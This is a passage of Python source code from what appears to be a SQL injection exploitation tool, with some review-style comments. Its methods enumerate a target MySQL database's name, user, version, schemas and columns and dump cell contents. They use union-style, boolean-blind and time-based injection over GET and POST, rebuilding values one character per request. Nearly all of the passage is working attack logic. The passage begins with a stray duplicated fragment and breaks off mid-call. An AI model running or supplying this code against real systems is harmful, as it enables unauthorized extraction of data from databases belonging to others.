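                                    isCount=True, sqlirequest=self.sqlirequest)
            content_len = int(retVal)

            logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len))
            logger.info("[*] content_len: %d" % content_len)

            # Rebuild the value one character per request (1-based substring).
            # The progress-bar label matches the "build" branch so both modes
            # report the same step.
            content = ""
            logger.debug("Start %dth content sqli..." % (limits + 1))

            for j in trange(int(content_len), desc='%dth Content sqli' % (limits + 1), leave=False):
                retVal = time_injection(select="ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))",
                                        source=database_name + "." + table_name,
                                        limit=limits,
                                        dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                        isStrings=True, sqlirequest=self.sqlirequest)
                content += chr(retVal)

            logger.debug("Content sqli success...The content is %s..." % content)

            # Hand the result back as a (column, value) tuple.
            contents = [column_name, content]
            logger.info("[*] content: %s" % content)
            result.put(tuple(contents))

        else:
            # Nothing is queued in this case; say so instead of leaving a
            # consumer waiting on `result` with no explanation in the log.
            logger.warning("Unknown sqlimethod %s, content for column %s limit %d not fetched..." %
                           (self.sqlimethod, column_name, limits))

        logger.debug("Sqli table %s column %s limit %d success..." % (table_name, column_name, limits))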
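    def get_content(self, result, database_name, table_name, column_name,
                    limits):
        """Read one cell (row ``limits`` of ``column_name``) and queue it.

        The extraction strategy is selected by ``self.sqlimethod``:

        * ``"normal"``: one request for the length, one for the value.
        * ``"build"`` and ``"time"``: one request for the length, then one
          request per character through ``ascii(substring(...))``.

        Args:
            result: queue-like object; the pair ``(column_name, content)`` is
                handed to ``result.put`` as a tuple.
            database_name: schema the table belongs to.
            table_name: table to read from.
            column_name: column to read; it is wrapped in backticks.
            limits: zero-based row offset forwarded as ``limit``.

        Returns:
            None. When ``self.sqlimethod`` matches none of the three modes a
            warning is logged and nothing is queued.
        """
        content_len = 0
        logger.debug("Start sqli table %s column %s limit %d content..." %
                     (table_name, column_name, limits))

        logger.debug("The sqlirequest is %s, start sqli content..." %
                     self.sqlirequest)

        if self.sqlimethod == "normal":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)

            # Length of this cell's value.
            logger.debug("Start %dth content length sqli..." % (limits + 1))

            content_len = normal_injection(
                select="length(`" + column_name + "`)",
                source=database_name + "." + table_name,
                limit=limits,
                dealpayload=self.dealpayload,
                data=self.Data,
                isCount=True,
                sqlirequest=self.sqlirequest)

            logger.debug(
                "Content length sqli success...now is limit %d, The content_len is %d..."
                % (limits, content_len))
            logger.info("[*] content_len: %d" % content_len)

            # The value itself, fetched in a single request.
            logger.debug("Start %dth content sqli..." % (limits + 1))

            content = normal_injection(select="`" + column_name + "`",
                                       source=database_name + "." + table_name,
                                       limit=limits,
                                       dealpayload=self.dealpayload,
                                       data=self.Data,
                                       isStrings=True,
                                       sqlirequest=self.sqlirequest)

            logger.debug("Content sqli success...The content is %s..." %
                         content)

            # Hand the result back as a (column, value) tuple.
            contents = [column_name, content]
            logger.info("[*] content: %s" % content)
            result.put(tuple(contents))

        elif self.sqlimethod == "build":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)

            # Length of this cell's value; the helper returns a raw value,
            # so normalise it to int before using it as a loop bound.
            retVal = build_injection(select="length(`" + column_name + "`)",
                                     source=database_name + "." + table_name,
                                     limit=limits,
                                     dealpayload=self.dealpayload,
                                     data=self.Data,
                                     lens=self.len,
                                     isCount=True,
                                     sqlirequest=self.sqlirequest)
            content_len = int(retVal)

            logger.debug(
                "Content length sqli success...now is limit %d, The content_len is %d..."
                % (limits, content_len))
            logger.info("[*] content_len: %d" % content_len)

            # Rebuild the value one character per request; substring() is
            # 1-based, hence j + 1.
            content = ""
            logger.debug("Start %dth content sqli..." % (limits + 1))

            for j in trange(int(content_len),
                            desc='%dth Content sqli' % (limits + 1),
                            leave=False):
                retVal = build_injection(
                    select="ascii(substring(`" + column_name + "`," +
                    repr(j + 1) + ",1))",
                    source=database_name + "." + table_name,
                    limit=limits,
                    dealpayload=self.dealpayload,
                    data=self.Data,
                    lens=self.len,
                    isStrings=True,
                    sqlirequest=self.sqlirequest)
                content += chr(retVal)

            logger.debug("Content sqli success...The content is %s..." %
                         content)

            # Hand the result back as a (column, value) tuple.
            contents = [column_name, content]
            logger.info("[*] content: %s" % content)
            result.put(tuple(contents))

        elif self.sqlimethod == "time":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)

            # Length of this cell's value; normalised to int as in "build".
            retVal = time_injection(select="length(`" + column_name + "`)",
                                    source=database_name + "." + table_name,
                                    limit=limits,
                                    dealpayload=self.dealpayload,
                                    data=self.Data,
                                    times=self.time,
                                    isCount=True,
                                    sqlirequest=self.sqlirequest)
            content_len = int(retVal)

            logger.debug(
                "Content length sqli success...now is limit %d, The content_len is %d..."
                % (limits, content_len))
            logger.info("[*] content_len: %d" % content_len)

            # Rebuild the value one character per request (1-based substring).
            # The progress-bar label matches the "build" branch so both modes
            # report the same step.
            content = ""
            logger.debug("Start %dth content sqli..." % (limits + 1))

            for j in trange(int(content_len),
                            desc='%dth Content sqli' % (limits + 1),
                            leave=False):
                retVal = time_injection(
                    select="ascii(substring(`" + column_name + "`," +
                    repr(j + 1) + ",1))",
                    source=database_name + "." + table_name,
                    limit=limits,
                    dealpayload=self.dealpayload,
                    data=self.Data,
                    times=self.time,
                    isStrings=True,
                    sqlirequest=self.sqlirequest)
                content += chr(retVal)

            logger.debug("Content sqli success...The content is %s..." %
                         content)

            # Hand the result back as a (column, value) tuple.
            contents = [column_name, content]
            logger.info("[*] content: %s" % content)
            result.put(tuple(contents))

        else:
            # Nothing is queued in this case; say so instead of leaving a
            # consumer waiting on `result` with no explanation in the log.
            logger.warning(
                "Unknown sqlimethod %s, content for column %s limit %d not fetched..."
                % (self.sqlimethod, column_name, limits))

        logger.debug("Sqli table %s column %s limit %d success..." %
                     (table_name, column_name, limits))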
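    def get_content_count(self, database_name, table_name):
        """Return the number of rows in ``database_name.table_name``.

        The count comes from ``count(*)`` through the injection mode named by
        ``self.sqlimethod`` (``"normal"``, ``"build"`` or ``"time"``). The
        ``build`` and ``time`` helpers return a raw value that is converted
        with ``int``; ``normal`` returns its value unchanged.

        Args:
            database_name: schema the table belongs to.
            table_name: table to count.

        Returns:
            The row count, or None when ``self.sqlimethod`` matches none of
            the known modes (a warning is logged in that case).
        """
        logger.debug("Start sqli table %s content amount..." % table_name)

        logger.debug("The sqlirequest is %s, start sqli content..." %
                     self.sqlirequest)

        if self.sqlimethod == "normal":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)
            logger.debug("Start table's %s content amount sqli..." %
                         table_name)

            # Row count, used as returned by the helper.
            content_count = normal_injection(select="count(*)",
                                             source=database_name + "." +
                                             table_name,
                                             dealpayload=self.dealpayload,
                                             data=self.Data,
                                             isCount=True,
                                             sqlirequest=self.sqlirequest)
            logger.debug("Content account sqli success...The count is %d..." %
                         content_count)

            logger.info("[*] content count: %d" % content_count)
            return content_count

        elif self.sqlimethod == "build":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)
            logger.debug("Start table's %s content amount sqli..." %
                         table_name)

            retVal = build_injection(select="count(*)",
                                     source=database_name + "." + table_name,
                                     dealpayload=self.dealpayload,
                                     data=self.Data,
                                     lens=self.len,
                                     isCount=True,
                                     sqlirequest=self.sqlirequest)
            # Raw value from the helper; normalise to int.
            content_count = int(retVal)

            logger.debug(
                "Content account sqli success...The content_count is %d..." %
                content_count)

            # Reported once, with the same label as the "normal" branch.
            logger.info("[*] content count: %d" % content_count)
            return content_count

        elif self.sqlimethod == "time":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)

            logger.debug("Start table's %s content amount sqli..." %
                         table_name)

            retVal = time_injection(select="count(*)",
                                    source=database_name + "." + table_name,
                                    dealpayload=self.dealpayload,
                                    data=self.Data,
                                    times=self.time,
                                    isCount=True,
                                    sqlirequest=self.sqlirequest)
            # Raw value from the helper; normalise to int.
            content_count = int(retVal)

            logger.debug(
                "Content account sqli success...The content_count is %d..." %
                content_count)

            # Reported once, with the same label as the "normal" branch.
            logger.info("[*] content count: %d" % content_count)
            return content_count

        # No mode matched: make the None result visible in the log rather
        # than returning it silently.
        logger.warning("Unknown sqlimethod %s, content count for %s.%s not fetched..." %
                       (self.sqlimethod, database_name, table_name))
        return None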
    def get_now_database(self):
        """Return the name of the database the injected query executes in.

        The server-side expression is ``database()``. In ``"normal"`` mode
        the length and then the whole name are fetched in one request each;
        in ``"build"`` and ``"time"`` mode the length is fetched first and the
        name is then rebuilt one character per request via
        ``ascii(mid(database(), i, 1))``.

        Returns:
            The database name as a str. If ``self.sqlimethod`` matches none of
            the three modes the initial empty string is returned.
        """
        database = ""

        logger.debug("The sqlirequest is %s, start sqli database..." % self.sqlirequest)
        if self.sqlimethod == "normal":
            # Length of the database name first.
            logger.debug("The sqlimethod is %s..." % self.sqlimethod)
            logger.debug("Start database length sqli...")

            database_len = normal_injection(select='length(database())', dealpayload=self.dealpayload,
                                            data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                            )

            logger.debug("Database length sqli success...The database_len is %d..." % database_len)
            print "[*] database_len: %d" % database_len

            # Then the name itself, in a single request.
            logger.debug("Start database sqli...")

            database = normal_injection(select='database()', dealpayload=self.dealpayload,
                                        data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
                                        )

            logger.debug("Database sqli success...The database is %s" % database)
            print "[*] database: %s" % database

        elif self.sqlimethod == "build":

            # self.len of 0 is treated as "not calibrated yet"; self.test()
            # presumably sets it before build_injection needs lens -- confirm
            # against test().
            if self.len == 0:
                self.test(output=0)
            # Length of the database name first; the helper returns a raw
            # value, so normalise it to int before using it as a loop bound.
            logger.debug("The sqlimethod is %s..." % self.sqlimethod)
            logger.debug("Start database length sqli...")
            retVal = build_injection(select="length(database())",
                                     dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                                     isCount=True, sqlirequest=self.sqlirequest)
            database_len = int(retVal)

            logger.debug("Database length sqli success...The database_len is %d..." % database_len)
            print "[*] database_len: %d" % database_len
            # logger.debug("Database length sqli payload Queue build success...")

            # Rebuild the name one character per request. This loop runs from
            # 1 to database_len inclusive because mid() is 1-based; the "time"
            # branch below iterates from 0 and adds 1 instead -- same positions.
            logger.debug("Start database sqli...")
            for i in trange(1, database_len+1, leave=False):
                retVal = build_injection(select="ascii(mid(database()," + repr(i) + ",1))",
                                         dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                                         isStrings=True, sqlirequest=self.sqlirequest)
                database += chr(retVal)
            logger.debug("Database sqli success...The database is %s" % database)
            print "[*] database: %s" % database

        elif self.sqlimethod == "time":
            # Length of the database name first; normalised to int as in
            # "build". Note this branch does not run self.test() first.
            logger.debug("The sqlimethod is %s..." % self.sqlimethod)
            logger.debug("Start database length sqli...")

            retVal = time_injection(select="length(database())",
                                    dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                    isCount=True, sqlirequest=self.sqlirequest)
            database_len = int(retVal)

            logger.debug("Database length sqli success...The database_len is %d..." % database_len)
            print "[*] database_len: %d" % database_len
            # logger.debug("Database length sqli payload Queue build success...")

            # Rebuild the name one character per request; i + 1 because mid()
            # is 1-based.
            logger.debug("Start database sqli...")

            for i in trange(database_len, leave=False):
                retVal = time_injection(select="ascii(mid(database()," + repr(i + 1) + ",1))",
                                        dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                        isStrings=True, sqlirequest=self.sqlirequest)
                database += chr(retVal)

            logger.debug("Database sqli success...The database is %s" % database)
            print "[*] database: %s" % database
    def get_database(self):
        """Enumerate schema names from ``information_schema.SCHEMATA``.

        Dispatches on ``self.sqlimethod``: ``"normal"`` reads the count and
        each name straight out of the response; ``"build"`` and ``"time"`` are
        the blind modes (the former presumably boolean-based — confirm in
        ``build_injection``) and recover the count, each name's length and then
        the name one ``ascii()`` value at a time.  Every recovered name other
        than ``information_schema`` is appended to ``self.databases_name``
        (other system schemas such as ``mysql`` are *not* filtered out), and
        the comma-joined list is printed at the end.  Any other ``sqlimethod``
        enumerates nothing and still prints the (possibly empty) list.

        NOTE(review): the names are target-controlled bytes and are printed and
        logged without escaping; building them with ``chr()`` from a per-byte
        ``ascii()`` only round-trips single-byte characters.
        """
        logger.debug("The sqlirequest is %s, start sqli databases..." % self.sqlirequest)

        method = self.sqlimethod
        schemata = 'information_schema.SCHEMATA'

        if method == "normal":
            logger.debug("The sqlimethod is %s..." % method)
            logger.debug("Start database amount sqli...")

            # One request for the schema count.
            total = normal_injection(select='COUNT(`SCHEMA_NAME`)',
                                     source=schemata,
                                     dealpayload=self.dealpayload,
                                     data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                     )

            logger.debug("Databases amount sqli success...The databases_number is %d..." % total)
            print("[*] databases_number: %d" % total)

            # disable=True keeps tqdm silent here; a bar is only shown for the
            # per-character loops of the blind modes.
            for idx in trange(int(total), desc="Database sqli...", leave=False, disable=True):
                nth = idx + 1
                logger.debug("Start %dth database length sqli..." % nth)

                # The length is fetched and logged even though the name is read
                # in one shot below (kept for parity with the blind modes).
                name_len = normal_injection(select='length(`SCHEMA_NAME`)',
                                            source=schemata,
                                            limit=idx,
                                            dealpayload=self.dealpayload,
                                            data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                            )

                logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % (nth, name_len))
                logger.info("[*] %dth databases_name_len: %d" % (nth, name_len))

                logger.debug("Start %dth database name sqli..." % nth)

                schema = normal_injection(select='`SCHEMA_NAME`',
                                          source=schemata, limit=idx,
                                          dealpayload=self.dealpayload,
                                          data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
                                          )

                logger.debug(
                    "%dth Databases name sqli success...The databases_name is %s..." % (nth, schema))

                # Only information_schema is skipped.
                if schema != "information_schema":
                    self.databases_name.append(schema)
                logger.info("[*] %dth databases_name: %s" % (nth, schema))

        elif method in ("build", "time"):
            logger.debug("The sqlimethod is %s..." % method)
            logger.debug("Start database amount sqli...")

            # Both blind modes issue the same request sequence and emit the
            # same log lines; only the primitive and its tuning knob differ.
            if method == "build":
                primitive, tuning = build_injection, {"lens": self.len}
            else:
                primitive, tuning = time_injection, {"times": self.time}

            def blind(**query):
                # query carries select/source/limit plus the isCount/isStrings flag.
                return primitive(dealpayload=self.dealpayload, data=self.Data,
                                 sqlirequest=self.sqlirequest, **dict(tuning, **query))

            total = int(blind(select="COUNT(`SCHEMA_NAME`)", source=schemata, isCount=True))

            logger.debug("Databases amount sqli success...The databases_number is %d..." % total)
            logger.info("[*] databases_number: %d" % total)

            for idx in range(0, total):
                nth = idx + 1
                logger.debug("Start %dth database length sqli..." % nth)

                name_len = int(blind(select="length(`SCHEMA_NAME`)", source=schemata,
                                     limit=idx, isCount=True))

                logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % (nth, name_len))
                logger.info("[*] %dth databases_name_len: %d" % (nth, name_len))

                logger.debug("Start %dth database sqli..." % nth)

                # One blind request per character; substring() positions are 1-based.
                schema = "".join(
                    chr(blind(select="ascii(substring(`SCHEMA_NAME`," + repr(pos + 1) + ",1))",
                              source=schemata, limit=idx, isStrings=True))
                    for pos in trange(name_len, desc='%dth Database sqli' % nth, leave=False))

                logger.debug(
                    "%dth Databases name sqli success...The databases_name is %s..." % (nth, schema))

                # Only information_schema is skipped.
                if schema != "information_schema":
                    self.databases_name.append(schema)

                logger.info("[*] %dth databases_name: %s" % (nth, schema))

        print("[*] databases_name list: " + ','.join(self.databases_name))
    def get_user(self):
        """Recover ``user()`` — the account the target's queries run under.

        ``self.sqlimethod`` picks the primitive: ``"normal"`` fetches the
        length and then the whole string directly; ``"build"`` and ``"time"``
        (the blind modes) recover the length, then one character per request
        via ``ascii(mid(user(), pos, 1))``.  The result is only printed and
        logged — nothing is returned or stored on ``self``.  Any other
        ``sqlimethod`` does nothing beyond the first debug line.

        NOTE(review): the value is target-controlled and is echoed to the
        terminal/log unescaped; ``chr()`` of a per-byte ``ascii()`` only
        round-trips single-byte characters.
        """
        logger.debug("The sqlirequest is %s, start sqli user..." % self.sqlirequest)
        method = self.sqlimethod

        if method == "normal":
            logger.debug("The sqlimethod is %s..." % method)
            logger.debug("Start user length sqli...")

            user_len = normal_injection(select='length(user())', dealpayload=self.dealpayload,
                                        data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                        )
            logger.debug("User length sqli success...The user_len is %d..." % user_len)
            print("[*] user_len: %d" % user_len)

            logger.debug("Start user sqli...")
            account = normal_injection(select='user()', dealpayload=self.dealpayload,
                                       data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
                                       )
            logger.debug("User sqli success...The user is %s" % account)
            print("[*] user: %s" % account)

        elif method == "build":
            logger.debug("The sqlimethod is %s..." % method)
            logger.debug("Start user length sqli...")

            def boolean(select, **flag):
                # build_injection with this instance's request settings applied.
                return build_injection(select=select, dealpayload=self.dealpayload,
                                       data=self.Data, lens=self.len,
                                       sqlirequest=self.sqlirequest, **flag)

            user_len = int(boolean("length(user())", isCount=True))
            logger.debug("User length sqli success...The user_len is %d..." % user_len)
            print("[*] user_len: %d" % user_len)

            logger.debug("Start user sqli...")
            # mid() positions are 1-based; one blind request per character.
            account = "".join(chr(boolean("ascii(mid(user()," + repr(pos) + ",1))", isStrings=True))
                              for pos in trange(1, user_len + 1, leave=False))
            logger.debug("User sqli success...The user is %s" % account)
            print("[*] user: %s" % account)

        elif method == "time":
            logger.debug("The sqlimethod is %s..." % method)
            logger.debug("Start user length sqli...")

            def timed(select, **flag):
                # time_injection with this instance's request settings applied.
                return time_injection(select=select, dealpayload=self.dealpayload,
                                      data=self.Data, times=self.time,
                                      sqlirequest=self.sqlirequest, **flag)

            user_len = int(timed("length(user())", isCount=True))
            logger.debug("User length sqli success...The user_len is %d..." % user_len)
            print("[*] user_len: %d" % user_len)

            logger.debug("Start user sqli...")
            # mid() positions are 1-based; one blind request per character.
            account = "".join(chr(timed("ascii(mid(user()," + repr(pos + 1) + ",1))", isStrings=True))
                              for pos in trange(user_len, leave=False))
            logger.debug("user sqli success...The user is %s" % account)
            print("[*] user: %s" % account)
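    def get_version(self):
        """Recover ``version()`` — the target's database server version string.

        ``self.sqlimethod`` picks the primitive: ``"normal"`` fetches the
        length and then the whole string directly; ``"build"`` and ``"time"``
        (the blind modes) recover the length, then one character per request
        via ``ascii(mid(version(), pos, 1))``.  The result is only printed and
        logged — nothing is returned or stored on ``self``.  Any other
        ``sqlimethod`` does nothing beyond the first debug line.

        Fix: the "normal" branch used to log ``Start database sqli...`` (a
        copy-paste leftover) before reading the version; it now logs
        ``Start version sqli...`` so the debug trail matches the request made.

        NOTE(review): the value is target-controlled and is echoed to the
        terminal/log unescaped; ``chr()`` of a per-byte ``ascii()`` only
        round-trips single-byte characters.
        """
        logger.debug("The sqlirequest is %s, start sqli version..." % self.sqlirequest)
        method = self.sqlimethod

        if method == "normal":
            logger.debug("The sqlimethod is %s..." % method)

            version_len = normal_injection(select='length(version())', dealpayload=self.dealpayload,
                                           data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                           )
            logger.debug("Version length sqli success...The version_len is %d..." % version_len)
            print("[*] version_len: %d" % version_len)

            # Was "Start database sqli..." — wrong subject for this request.
            logger.debug("Start version sqli...")
            banner = normal_injection(select='version()', dealpayload=self.dealpayload,
                                      data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
                                      )
            logger.debug("Version sqli success...The version is %s" % banner)
            print("[*] version: %s" % banner)

        elif method == "build":
            logger.debug("The sqlimethod is %s..." % method)
            logger.debug("Start version length sqli...")

            def boolean(select, **flag):
                # build_injection with this instance's request settings applied.
                return build_injection(select=select, dealpayload=self.dealpayload,
                                       data=self.Data, lens=self.len,
                                       sqlirequest=self.sqlirequest, **flag)

            version_len = int(boolean("length(version())", isCount=True))
            logger.debug("Version length sqli success...The version_len is %d..." % version_len)
            print("[*] version_len: %d" % version_len)

            logger.debug("Start version sqli...")
            # mid() positions are 1-based; one blind request per character.
            banner = "".join(chr(boolean("ascii(mid(version()," + repr(pos) + ",1))", isStrings=True))
                             for pos in trange(1, version_len + 1, leave=False))
            logger.debug("version sqli success...The version is %s" % banner)
            print("[*] version: %s" % banner)

        elif method == "time":
            logger.debug("The sqlimethod is %s..." % method)
            logger.debug("Start version length sqli...")

            def timed(select, **flag):
                # time_injection with this instance's request settings applied.
                return time_injection(select=select, dealpayload=self.dealpayload,
                                      data=self.Data, times=self.time,
                                      sqlirequest=self.sqlirequest, **flag)

            version_len = int(timed("length(version())", isCount=True))
            logger.debug("Version length sqli success...The version_len is %d..." % version_len)
            print("[*] version_len: %d" % version_len)

            logger.debug("Start version sqli...")
            # mid() positions are 1-based; one blind request per character.
            banner = "".join(chr(timed("ascii(mid(version()," + repr(pos + 1) + ",1))", isStrings=True))
                             for pos in trange(version_len, leave=False))
            logger.debug("Version sqli success...The version is %s" % banner)
            print("[*] version: %s" % banner)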
    def get_columns(self):

        # 若tables_name未设置,则全跑一遍
        if len(self.tables_name) == 0:
            SqliTables.get_tables(self)

        # 首先是每个database_name
        for database_name in self.tables_name:

            # 每个databases_name声明为一个字典
            self.columns_name[database_name] = {}

            # 每个table_name需要跑一次columns_name
            for table_name in self.tables_name[database_name]:

                # 每个table_name中的columns_name声明为一个列表储存
                columns_name = []

                # 开始跑columns_name
                logger.debug(
                    "Start sqli databases %s's tables %s's columns..." %
                    (database_name, table_name))

                # 先GET
                if self.sqlirequest == "GET":
                    logger.debug(
                        "The sqlirequest is %s, start sqli columns..." %
                        self.sqlirequest)

                    if self.sqlimethod == "normal":

                        logger.debug("The sqlimethod is %s..." %
                                     self.sqlimethod)
                        logger.debug("Start table's %s column amount sqli..." %
                                     table_name)

                        # 先注columns的数量

                        columns_number = normal_injection(
                            select='COUNT(*)',
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name +
                            "' && table_schema = '" + database_name + "'",
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            isCount=True,
                            sqlirequest=self.sqlirequest)

                        logger.debug(
                            "Columns account sqli success...The columns_number is %d..."
                            % columns_number)
                        logger.info("[*] columns_number: %d" % columns_number)

                        # 每个循环跑一次columns的数据
                        for i in trange(int(columns_number),
                                        desc="Column sqli...",
                                        leave=False,
                                        disable=True):
                            # 首先是column name的长度
                            logger.debug("Start %dth column length sqli..." %
                                         (i + 1))

                            column_name_len = normal_injection(
                                select='length(column_name)',
                                source="information_schema.columns",
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                isCount=True,
                                sqlirequest=self.sqlirequest)

                            logger.debug(
                                "%dth Column name length sqli success...The column_name_len is %d..."
                                % ((i + 1), column_name_len))
                            logger.info("[*] %dth column_name_len: %d" %
                                        ((i + 1), column_name_len))

                            # 然后注columns name

                            column_name = normal_injection(
                                select='column_name',
                                source='information_schema.columns',
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                isStrings=True,
                                sqlirequest=self.sqlirequest)

                            logger.debug(
                                "%dth Column name sqli success...The column_name is %s..."
                                % ((i + 1), column_name))

                            # 把columns_name插入列表
                            columns_name.append(column_name)
                            logger.info("[*] %dth column_name: %s" %
                                        ((i + 1), column_name))

                    elif self.sqlimethod == "build":

                        logger.debug("The sqlimethod is %s..." %
                                     self.sqlimethod)
                        logger.debug("Start table's %s column amount sqli..." %
                                     table_name)

                        retVal = build_injection(
                            select="COUNT(column_name)",
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name +
                            "' && table_schema = '" + database_name + "'",
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            lens=self.len,
                            isCount=True,
                            sqlirequest=self.sqlirequest)
                        columns_number = int(retVal)

                        logger.debug(
                            "Columns account sqli success...The columns_number is %d..."
                            % columns_number)
                        logger.info("[*] columns_number: %d" % columns_number)

                        for i in range(0, int(columns_number)):
                            # 然后注 columns_number 的 length
                            logger.debug("Start %dth column length sqli..." %
                                         (i + 1))

                            retVal = build_injection(
                                select="length(column_name)",
                                source="information_schema.columns",
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                lens=self.len,
                                isCount=True,
                                sqlirequest=self.sqlirequest)
                            column_name_len = int(retVal)

                            logger.debug(
                                "%dth Column name length sqli success...The column_name_len is %d..."
                                % ((i + 1), column_name_len))
                            logger.info("[*] %dth column_name_len: %d" %
                                        ((i + 1), column_name_len))

                            # 然后注column名字
                            # 清空column_name
                            column_name = ""
                            logger.debug("Start %dth column sqli..." % (i + 1))

                            for j in trange(int(column_name_len),
                                            desc='%dth Column sqli' % (i + 1),
                                            leave=False):
                                retVal = build_injection(
                                    select="ascii(substring(column_name," +
                                    repr(j + 1) + ",1))",
                                    source="information_schema.columns",
                                    conditions="table_name = '" + table_name +
                                    "' && table_schema = '" + database_name +
                                    "'",
                                    limit=i,
                                    dealpayload=self.dealpayload,
                                    data=self.Data,
                                    lens=self.len,
                                    isStrings=True,
                                    sqlirequest=self.sqlirequest)
                                column_name += chr(retVal)

                            logger.debug(
                                "%dth Column name sqli success...The column_name is %s..."
                                % ((i + 1), column_name))

                            # 把columns_name插入列表
                            columns_name.append(column_name)
                            logger.info("[*] %dth column_name: %s" %
                                        ((i + 1), column_name))

                    elif self.sqlimethod == "time":

                        logger.debug("The sqlimethod is %s..." %
                                     self.sqlimethod)
                        logger.debug("Start table's %s column amount sqli..." %
                                     table_name)

                        retVal = time_injection(
                            select="COUNT(column_name)",
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name +
                            "' && table_schema = '" + database_name + "'",
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            times=self.time,
                            isCount=True,
                            sqlirequest=self.sqlirequest)
                        columns_number = int(retVal)

                        logger.debug(
                            "Columns account sqli success...The columns_number is %d..."
                            % columns_number)
                        logger.info("[*] columns_number: %d" % columns_number)

                        for i in range(0, int(columns_number)):
                            # 然后注 columns_number 的 length
                            logger.debug("Start %dth column length sqli..." %
                                         (i + 1))

                            retVal = time_injection(
                                select="length(column_name)",
                                source="information_schema.columns",
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                times=self.time,
                                isCount=True,
                                sqlirequest=self.sqlirequest)
                            column_name_len = int(retVal)

                            logger.debug(
                                "%dth Column name length sqli success...The column_name_len is %d..."
                                % ((i + 1), column_name_len))
                            logger.info("[*] %dth column_name_len: %d" %
                                        ((i + 1), column_name_len))

                            # 然后注columns名字
                            # 清空column_name
                            column_name = ""
                            logger.debug("Start %dth column sqli..." % (i + 1))

                            for j in trange(int(column_name_len),
                                            desc='%dth Column sqli' % (i + 1),
                                            leave=False):
                                retVal = time_injection(
                                    select="ascii(substring(column_name," +
                                    repr(j + 1) + ",1))",
                                    source="information_schema.columns",
                                    conditions="table_name = '" + table_name +
                                    "' && table_schema = '" + database_name +
                                    "'",
                                    limit=i,
                                    dealpayload=self.dealpayload,
                                    data=self.Data,
                                    times=self.time,
                                    isStrings=True,
                                    sqlirequest=self.sqlirequest)
                                column_name += chr(retVal)

                            logger.debug(
                                "%dth Column name sqli success...The column_name is %s..."
                                % ((i + 1), column_name))

                            # 把columns_name插入列表
                            columns_name.append(column_name)
                            logger.info("[*] %dth column_name: %s" %
                                        ((i + 1), column_name))

                # 然后是post
                elif self.sqlirequest == "POST":
                    logger.debug(
                        "The sqlirequest is %s, start sqli tables..." %
                        self.sqlirequest)

                    if self.sqlimethod == "normal":

                        logger.debug("The sqlimethod is %s..." %
                                     self.sqlimethod)
                        logger.debug("Start table's %s column amount sqli..." %
                                     table_name)

                        # 先注columns的数量

                        columns_number = normal_injection(
                            select='COUNT(*)',
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name +
                            "' && table_schema = '" + database_name + "'",
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            isCount=True,
                            sqlirequest=self.sqlirequest)

                        logger.debug(
                            "Columns account sqli success...The columns_number is %d..."
                            % columns_number)
                        logger.info("[*] columns_number: %d" % columns_number)

                        # 每个循环跑一次columns的数据
                        for i in trange(int(columns_number),
                                        desc="Column sqli...",
                                        leave=False,
                                        disable=True):

                            # 首先是column name的长度
                            logger.debug("Start %dth column length sqli..." %
                                         (i + 1))

                            column_name_len = normal_injection(
                                select='length(column_name)',
                                source="information_schema.columns",
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                isCount=True,
                                sqlirequest=self.sqlirequest)

                            logger.debug(
                                "%dth Column name length sqli success...The column_name_len is %d..."
                                % ((i + 1), column_name_len))
                            logger.info("[*] %dth column_name_len: %d" %
                                        ((i + 1), column_name_len))

                            # 然后注columns_name

                            column_name = normal_injection(
                                select='column_name',
                                source='information_schema.columns',
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                isStrings=True,
                                sqlirequest=self.sqlirequest)

                            logger.debug(
                                "%dth Column name sqli success...The column_name is %s..."
                                % ((i + 1), column_name))

                            # 把columns_name插入列表
                            columns_name.append(column_name)
                            logger.info("[*] %dth column_name: %s" %
                                        ((i + 1), column_name))

                    elif self.sqlimethod == "build":

                        logger.debug("The sqlimethod is %s..." %
                                     self.sqlimethod)
                        logger.debug("Start table's %s column amount sqli..." %
                                     table_name)

                        retVal = build_injection(
                            select="COUNT(column_name)",
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name +
                            "' && table_schema = '" + database_name + "'",
